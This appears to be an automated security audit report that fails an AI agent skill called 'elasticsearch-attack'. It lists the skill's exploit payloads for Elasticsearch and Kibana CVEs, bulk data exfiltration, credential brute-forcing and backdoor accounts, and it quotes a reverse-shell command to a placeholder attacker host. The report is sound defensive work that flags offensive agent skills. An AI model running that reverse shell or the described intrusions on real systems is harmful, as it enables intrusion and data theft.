elasticsearch-attack
Fail
Audited by Gen Agent Trust Hub on Aug 12, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFE
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation includes functional payloads for several known vulnerabilities (CVE-2014-3120, CVE-2015-1427, and CVE-2019-7609) that allow arbitrary command execution on Elasticsearch and Kibana servers.
- [REMOTE_CODE_EXECUTION]: Contains a Base64-encoded reverse shell command (
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1) designed to establish an interactive connection between the target server and an attacker-controlled host. - [DATA_EXFILTRATION]: Provides detailed procedures for enumerating and bulk-exporting entire database indices to external servers, specifically targeting sensitive fields such as passwords, tokens, and credit card numbers.
- [COMMAND_EXECUTION]: The skill includes instructions for utilizing network scanners (nmap), brute-forcing tools (hydra), and directory traversal payloads to identify services and read sensitive system files like
/etc/passwd. - [CREDENTIALS_UNSAFE]: Instructions are provided for creating backdoor superuser accounts and generating API keys to maintain long-term, unauthorized access to the target cluster.
Recommendations
- AI detected serious security threats
Audit Metadata